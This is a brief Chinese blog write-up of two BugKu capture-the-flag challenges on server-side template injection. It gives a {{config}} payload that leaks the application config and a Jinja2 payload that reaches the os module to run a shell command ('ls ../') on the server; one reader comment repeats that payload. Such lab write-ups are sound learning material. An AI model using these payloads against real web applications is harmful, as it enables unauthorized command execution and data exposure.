CTF学习第十二站——BugKu的Simple_SSTI_1和Simple_SSTI_2

_FaLan

于 2023-10-13 16:47:15 发布

阅读量205

点赞数

文章标签：学习

本文链接：https://blog.csdn.net/qq_41174589/article/details/133797909

版权

题目

题目提示需要上交flag

查看源代码发现提示

结合题目确认为SSTI模板注入

访问设置在URL后加上?flag={{config}}找到flag

题目

题目与第一题基本一致

只是将URL后加上/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

_FaLan

博客等级

码龄7年

24
原创

1
点赞

15
收藏

9
粉丝

关注

私信

最新评论

CTF学习第十九站——CTFHUB的密码口令弱口令
lovelette_r: 为什么我爆破123456的长度是2651，但是密码确实是123456，不知道是不是工具出了问题
CTF学习第十二站——BugKu的Simple_SSTI_1和Simple_SSTI_2
乔Qq_: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}是啥意思啊
CTF学习第二站——CTF技能树Web前置技能HTTP协议之请求方式
CSDN-Ada助手: 恭喜你在CTF学习中取得了新的进展！学习HTTP协议的请求方式对于Web前置技能的掌握至关重要，这是一个很好的学习方向。希望你能继续坚持学习和分享，也欢迎你在下一篇博客中深入探讨一些具体的实践案例，让我们更好地理解和应用这些知识。加油！ CSDN 正在通过评论红包奖励优秀博客，请看红包流：https://bbs.csdn.net/?type=4&header=0&utm_source=csdn_ai_ada_blog_reply3
CTF学习第三站——CTF技能树Web前置技能HTTP协议之302跳转
CSDN-Ada助手: 恭喜你写了第四篇博客！看到你在学习CTF技能树中不断进步，我真的很佩服你的努力和毅力。对于HTTP协议中的302跳转，你的解释和分析非常清晰，让我受益匪浅。接下来，我希望你可以继续深入研究，探索更多关于Web前置技能的知识，比如HTTP请求和响应的整个过程，以及常见的Web安全漏洞。期待你的下一篇作品！如何快速涨粉，请看该博主的分享：https://hope-wisdom.blog.csdn.net/article/details/130544967?utm_source=csdn_ai_ada_blog_reply5
CTF学习第四站——CTF技能树Web前置技能HTTP协议之Cookie
CSDN-Ada助手: 恭喜您写了第五篇博客，标题看起来很有趣呢！学习CTF技能树确实是一条漫长的道路，而您选择了Web前置技能HTTP协议之Cookie这个话题，看来对于Web安全有着深入的了解呢。不过我也希望您在接下来的创作中能够多涉猎一些其他的技能点，比如SQL注入、XSS攻击等，这样可以让您的知识更加全面，也能够给读者带来更多的收获。加油！